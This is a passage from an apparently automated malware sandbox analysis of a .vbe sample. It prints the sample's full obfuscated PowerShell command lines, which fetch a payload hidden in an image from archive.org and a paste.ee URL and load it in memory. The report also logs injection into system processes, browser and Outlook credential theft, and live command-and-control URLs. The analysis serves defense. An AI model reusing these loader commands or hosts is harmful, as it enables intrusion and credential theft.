'+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\appidtel.exe "C:\Windows\SysWOW64\appidtel.exe"Jump to behavior
              Source: C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exeProcess created: C:\Windows\SysWOW64\dllhost.exe "C:\Windows\SysWOW64\dllhost.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjgvudjpjb21zcevjwzqsmjysmjvdluppsu4njykoicgoj3swfwltjysnywdlvxjsid0gezf9ahr0chm6ly9pytywmdewjysnmi51cy5hcmnoaxzllm9yzy8zmi9pdgunkydtcy9kzxrhac1ub3rllxzfmjayndewl0rljysndgfotm90zscrj19wlmpwzyb7mx07ezb9d2viq2xpzw50id0gjysntmv3lu9iaicrj2vjdcbtexn0zw0utmv0lldlyknsascrj2unkyduddt7mh1pbwfnzuj5dgvzid0gezb9d2viq2xpzw4nkyd0lkrvd25sb2fkrgf0jysnysh7mh1pbwfnzvvybck7ezb9aw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzscrj3rtdhjpbmcoezb9aw1hz2vcexrlcyk7ezb9cycrj3rhcnrgbgfnid0gezf9pdxcqvnfnjrfu1rbulq+pnsxftt7mh1lbmrgbgfnid0gezf9pdxcqvnfjysnnjrfru5epj57mx07ezb9c3rhcnrjbmrleca9ihswfwltywdlvgv4dc5jbmrlee9mkhswfxn0yxj0rmxhzyk7ezb9zw5ksw5kzxggpsb7mh1pbwfnzvrlehqusw5kzxhpzih7mh1lbmrgbgfnktt7mh1zdgfydeluzgv4ic1nzsawic1hbmqgeycrjzb9zw5ksw5kzxgglwd0ihswfxn0yxj0sw5kzxg7ezb9c3rhcnrjbmrlecarpsb7mh1zdgfydezsywcutgvuz3qnkydoo3swfwjhc2u2nexlbmd0aca9ihswfwvuzeluzgv4ic0gezb9c3rhcnrjbmrledt7mh1iyxnlnjrdb21tyw5kid0gezb9aw1hz2vuzxh0lln1ynn0cmluzyh7mh1zdgfydeluzgv4lccrjyb7mh1iyxnlnjrmzw5ndggpo3swfwnvbw1hbmrcexrlcya9ifttexn0jysnzw0uq29udmvydf06okzybycrj21cyxnlnjrtdhjpbmcoezb9jysnymfzzty0q29tbwfuzck7ezb9bg9hjysnzgvkqxnzzw1ijysnbhkgpsankydbu3lzdgvtlljlzmxly3rpb24uqscrj3nzzw1ibhldojpmb2fkkhswfwnvbw1hbmrcexrlcyk7ezb9dmfptwv0ag9kid0gw2rubglilicrj0lplkhvbwunkyddlkdlde1ldghvzch7mx1wqul7mx0po3swfxzhau1ldghvzc5jbnzva2uoezb9bnvsbcwgqccrjyh7mx0wl2hcueztl2qvzwuuzxrzyxavlzpzchr0ahsxfscrjywgezf9zgvzyxrpdmfkb3sxfswgezf9zgvzyxrpdmfkb3sxfswgezf9zgvzyxrpdmfkb3sxfswgezf9zgvzyxrpdicrj2fkb3sxfswgezf9mxsxfswgezf9yxbwawr0zwx7mscrj30pktsnksatziagw2niqxjdmzysw2niqxjdmzkpkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $env:comspec[4,26,25]-join'')( (('{0}im'+'ageurl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/de'+'tahnote'+'_v.jpg {1};{0}webclient = '+'new-obj'+'ect system.net.webcli'+'e'+'nt;{0}imagebytes = {0}webclien'+'t.downloaddat'+'a({0}imageurl);{0}imagetext = [system.text.encoding]::utf8.ge'+'tstring({0}imagebytes);{0}s'+'tartflag = {1}<<base64_start>>{1};{0}endflag = {1}<<base'+'64_end>>{1};{0}startindex = {0}imagetext.indexof({0}startflag);{0}endindex = {0}imagetext.indexof({0}endflag);{0}startindex -ge 0 -and {'+'0}endindex -gt {0}startindex;{0}startindex += {0}startflag.lengt'+'h;{0}base64length = {0}endindex - {0}startindex;{0}base64command = {0}imagetext.substring({0}startindex,'+' {0}base64length);{0}commandbytes = [syst'+'em.convert]::fro'+'mbase64string({0}'+'base64command);{0}loa'+'dedassemb'+'ly = '+'[system.reflection.a'+'ssembly]::load({0}commandbytes);{0}vaimethod = [dnlib.'+'io.home'+'].getmethod({1}vai{1});{0}vaimethod.invoke({0}null, @'+'({1}0/hbpfm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [char]36,[char]39))"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'liggjgvudjpjb21zcevjwzqsmjysmjvdluppsu4njykoicgoj3swfwltjysnywdlvxjsid0gezf9ahr0chm6ly9pytywmdewjysnmi51cy5hcmnoaxzllm9yzy8zmi9pdgunkydtcy9kzxrhac1ub3rllxzfmjayndewl0rljysndgfotm90zscrj19wlmpwzyb7mx07ezb9d2viq2xpzw50id0gjysntmv3lu9iaicrj2vjdcbtexn0zw0utmv0lldlyknsascrj2unkyduddt7mh1pbwfnzuj5dgvzid0gezb9d2viq2xpzw4nkyd0lkrvd25sb2fkrgf0jysnysh7mh1pbwfnzvvybck7ezb9aw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kaw5nxto6vvrgoc5hzscrj3rtdhjpbmcoezb9aw1hz2vcexrlcyk7ezb9cycrj3rhcnrgbgfnid0gezf9pdxcqvnfnjrfu1rbulq+pnsxftt7mh1lbmrgbgfnid0gezf9pdxcqvnfjysnnjrfru5epj57mx07ezb9c3rhcnrjbmrleca9ihswfwltywdlvgv4dc5jbmrlee9mkhswfxn0yxj0rmxhzyk7ezb9zw5ksw5kzxggpsb7mh1pbwfnzvrlehqusw5kzxhpzih7mh1lbmrgbgfnktt7mh1zdgfydeluzgv4ic1nzsawic1hbmqgeycrjzb9zw5ksw5kzxgglwd0ihswfxn0yxj0sw5kzxg7ezb9c3rhcnrjbmrlecarpsb7mh1zdgfydezsywcutgvuz3qnkydoo3swfwjhc2u2nexlbmd0aca9ihswfwvuzeluzgv4ic0gezb9c3rhcnrjbmrledt7mh1iyxnlnjrdb21tyw5kid0gezb9aw1hz2vuzxh0lln1ynn0cmluzyh7mh1zdgfydeluzgv4lccrjyb7mh1iyxnlnjrmzw5ndggpo3swfwnvbw1hbmrcexrlcya9ifttexn0jysnzw0uq29udmvydf06okzybycrj21cyxnlnjrtdhjpbmcoezb9jysnymfzzty0q29tbwfuzck7ezb9bg9hjysnzgvkqxnzzw1ijysnbhkgpsankydbu3lzdgvtlljlzmxly3rpb24uqscrj3nzzw1ibhldojpmb2fkkhswfwnvbw1hbmrcexrlcyk7ezb9dmfptwv0ag9kid0gw2rubglilicrj0lplkhvbwunkyddlkdlde1ldghvzch7mx1wqul7mx0po3swfxzhau1ldghvzc5jbnzva2uoezb9bnvsbcwgqccrjyh7mx0wl2hcueztl2qvzwuuzxrzyxavlzpzchr0ahsxfscrjywgezf9zgvzyxrpdmfkb3sxfswgezf9zgvzyxrpdmfkb3sxfswgezf9zgvzyxrpdmfkb3sxfswgezf9zgvzyxrpdicrj2fkb3sxfswgezf9mxsxfswgezf9yxbwawr0zwx7mscrj30pktsnksatziagw2niqxjdmzysw2niqxjdmzkpkq==';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command ".( $env:comspec[4,26,25]-join'')( (('{0}im'+'ageurl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/de'+'tahnote'+'_v.jpg {1};{0}webclient = '+'new-obj'+'ect system.net.webcli'+'e'+'nt;{0}imagebytes = {0}webclien'+'t.downloaddat'+'a({0}imageurl);{0}imagetext = [system.text.encoding]::utf8.ge'+'tstring({0}imagebytes);{0}s'+'tartflag = {1}<<base64_start>>{1};{0}endflag = {1}<<base'+'64_end>>{1};{0}startindex = {0}imagetext.indexof({0}startflag);{0}endindex = {0}imagetext.indexof({0}endflag);{0}startindex -ge 0 -and {'+'0}endindex -gt {0}startindex;{0}startindex += {0}startflag.lengt'+'h;{0}base64length = {0}endindex - {0}startindex;{0}base64command = {0}imagetext.substring({0}startindex,'+' {0}base64length);{0}commandbytes = [syst'+'em.convert]::fro'+'mbase64string({0}'+'base64command);{0}loa'+'dedassemb'+'ly = '+'[system.reflection.a'+'ssembly]::load({0}commandbytes);{0}vaimethod = [dnlib.'+'io.home'+'].getmethod({1}vai{1});{0}vaimethod.invoke({0}null, @'+'({1}0/hbpfm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [char]36,[char]39))"Jump to behavior
              Source: QEwzeZKCXN.exe, 0000000A.00000000.2668374645.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3411139115.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3411473122.00000000016C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
              Source: QEwzeZKCXN.exe, 0000000A.00000000.2668374645.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3411139115.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3411473122.00000000016C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: QEwzeZKCXN.exe, 0000000A.00000000.2668374645.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3411139115.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3411473122.00000000016C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: QEwzeZKCXN.exe, 0000000A.00000000.2668374645.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3411139115.0000000001720000.00000002.00000001.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3411473122.00000000016C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 5.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3409933313.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2743702515.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\SysWOW64\dllhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\dllhost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: 5.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3409933313.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.2743702515.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information11
              Scripting
              Valid Accounts1
              Exploitation for Client Execution
              11
              Scripting
              1
              Abuse Elevation Control Mechanism
              11
              Deobfuscate/Decode Files or Information
              1
              OS Credential Dumping
              2
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              1
              Web Service
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts11
              Command and Scripting Interpreter
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Abuse Elevation Control Mechanism
              LSASS Memory113
              System Information Discovery
              Remote Desktop Protocol1
              Data from Local System
              3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts3
              PowerShell
              Logon Script (Windows)512
              Process Injection
              3
              Obfuscated Files or Information
              Security Account Manager121
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              11
              Encrypted Channel
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              Software Packing
              NTDS2
              Process Discovery
              Distributed Component Object ModelInput Capture4
              Non-Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets41
              Virtualization/Sandbox Evasion
              SSHKeylogging5
              Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts41
              Virtualization/Sandbox Evasion
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items512
              Process Injection
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1530632 Sample: 10092024150836 09.10.2024.vbe Startdate: 10/10/2024 Architecture: WINDOWS Score: 100 45 www.568060007.xyz 2->45 47 paste.ee 2->47 49 8 other IPs or domains 2->49 57 Multi AV Scanner detection for domain / URL 2->57 59 Suricata IDS alerts for network traffic 2->59 61 Malicious sample detected (through community Yara rule) 2->61 67 10 other signatures 2->67 12 wscript.exe 1 2->12         started        signatures3 63 Performs DNS queries to domains with low reputation 45->63 65 Connects to a pastebin service (likely for C&C) 47->65 process4 signatures5 79 Suspicious powershell command line found 12->79 81 Wscript starts Powershell (via cmd or directly) 12->81 83 Bypasses PowerShell execution policy 12->83 85 2 other signatures 12->85 15 powershell.exe 7 12->15         started        process6 signatures7 95 Suspicious powershell command line found 15->95 97 Obfuscated command line found 15->97 99 Found suspicious powershell code related to unpacking or dynamic code loading 15->99 18 powershell.exe 14 15 15->18         started        22 conhost.exe 15->22         started        process8 dnsIp9 51 ia600102.us.archive.org 207.241.227.242, 443, 49711 INTERNET-ARCHIVEUS United States 18->51 53 www.airgame.store 188.114.96.3, 443, 49724, 49963 CLOUDFLARENETUS European Union 18->53 69 Writes to foreign memory regions 18->69 71 Injects a PE file into a foreign processes 18->71 24 appidtel.exe 18->24         started        signatures10 process11 signatures12 73 Maps a DLL or memory area into another process 24->73 27 QEwzeZKCXN.exe 24->27 injected process13 signatures14 75 Maps a DLL or memory area into another process 27->75 77 Found direct / indirect Syscall (likely to bypass EDR) 27->77 30 dllhost.exe 13 27->30         started        process15 signatures16 87 Tries to steal Mail credentials (via file / registry access) 30->87 89 Tries to harvest and steal browser information (history, passwords, etc) 30->89 91 Modifies the context of a thread in another process (thread injection) 30->91 93 3 other signatures 30->93 33 QEwzeZKCXN.exe 30->33 injected 37 firefox.exe 30->37         started        process17 dnsIp18 39 elitecbdgummies.net 172.96.186.204, 49958, 49959, 49960 SINGLEHOP-LLCUS Canada 33->39 41 568060007.xyz 18.163.12.6, 49954, 49955, 49956 AMAZON-02US United States 33->41 43 www.autoclean.shop 13.248.169.48, 49951, 80 AMAZON-02US United States 33->43 55 Found direct / indirect Syscall (likely to bypass EDR) 33->55 signatures19

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              10092024150836 09.10.2024.vbe3%ReversingLabsWin32.Trojan.Generic
              10092024150836 09.10.2024.vbe8%VirustotalBrowse
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              elitecbdgummies.net0%VirustotalBrowse
              ia600102.us.archive.org0%VirustotalBrowse
              paste.ee3%VirustotalBrowse
              www.airgame.store0%VirustotalBrowse
              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              https://contoso.com/License0%URL Reputationsafe
              https://aka.ms/pscore60%URL Reputationsafe
              https://aka.ms/pscore60%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://oneget.orgX0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
              https://oneget.org0%URL Reputationsafe
              http://ia600102.us.archive.org0%VirustotalBrowse
              https://securepubads.g.doubleclick.net/tag/js/gpt.js0%VirustotalBrowse
              https://analytics.paste.ee1%VirustotalBrowse
              https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg8%VirustotalBrowse
              https://paste.ee1%VirustotalBrowse
              https://www.google.com0%VirustotalBrowse
              https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgX0%VirustotalBrowse
              https://cdnjs.cloudflare.com0%VirustotalBrowse
              https://secure.gravatar.com0%VirustotalBrowse
              http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
              https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
              http://paste.ee3%VirustotalBrowse
              http://www.airgame.store0%VirustotalBrowse
              http://www.apache.org/licenses/LICENSE-2.00%VirustotalBrowse
              https://code.jquery.com/jquery-3.5.1.min.js1%VirustotalBrowse
              https://github.com/Pester/Pester1%VirustotalBrowse
              https://ia600102.us.archive.org0%VirustotalBrowse
              https://themes.googleusercontent.com0%VirustotalBrowse
              NameIPActiveMaliciousAntivirus DetectionReputation
              www.autoclean.shop
              13.248.169.48
              truefalse
                unknown
                elitecbdgummies.net
                172.96.186.204
                truetrueunknown
                568060007.xyz
                18.163.12.6
                truetrue
                  unknown
                  ia600102.us.archive.org
                  207.241.227.242
                  truetrueunknown
                  paste.ee
                  188.114.96.3
                  truetrueunknown
                  www.airgame.store
                  188.114.96.3
                  truetrueunknown
                  1ns6mg.vip
                  3.33.130.190
                  truetrue
                    unknown
                    www.elitecbdgummies.net
                    unknown
                    unknowntrue
                      unknown
                      www.568060007.xyz
                      unknown
                      unknowntrue
                        unknown
                        www.1ns6mg.vip
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          http://www.airgame.store/ojib/?-Xr8=9xYabYlQOuR2q+ns8Lzx9bRF8NZUoInv7x1TfUGCdfPrsqjtDMlDvLTTdBF+pu/1Frk+h/DxANwT0Hfs8j1jMkaM33w5ilCaxHtuGNiB0DtKNuQLcX24gGfpbrwRywwLDdzHNLM=&mBsxM=YJ0LnZ68true
                            unknown
                            https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpgtrueunknown
                            https://paste.ee/d/mFPBh/0true
                              unknown
                              http://www.autoclean.shop/fx9f/?mBsxM=YJ0LnZ68&-Xr8=yLkskDR0nY0t6IEYTVnouV0HkzfvHuAPmfbD5h8cln4aJalo4AVzLarmhH7o5TO/QYT7rLdNwPAjvarY55z4bEJvcGnuntwn6BS5zidhK+0y0eRY5oQOsBmzZX59GbhTRCQZQus=false
                                unknown
                                http://www.568060007.xyz/2jpw/true
                                  unknown
                                  http://www.568060007.xyz/2jpw/?-Xr8=qz9UzJ10+p/cjPnRdZlHv4YDQxf45KubwzSEjjTwjD/nUvv1s93evwIp+LTko4UKBcY0h9JnEtV5jsbq23POiYFTmg8OGBnfOhN/rQscVBLiXL1oe2kzRKc9D7hJiq/ZgM9Sylw=&mBsxM=YJ0LnZ68true
                                    unknown
                                    http://www.elitecbdgummies.net/iaoq/true
                                      unknown
                                      http://www.airgame.store/ojib/true
                                        unknown
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://duckduckgo.com/chrome_newtabdllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        https://duckduckgo.com/ac/?q=dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://securepubads.g.doubleclick.net/tag/js/gpt.jsdllhost.exe, 0000000B.00000002.3413640023.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3412271130.000000000384A000.00000004.00000001.00040000.00000000.sdmpfalseunknown
                                        https://contoso.com/Licensepowershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
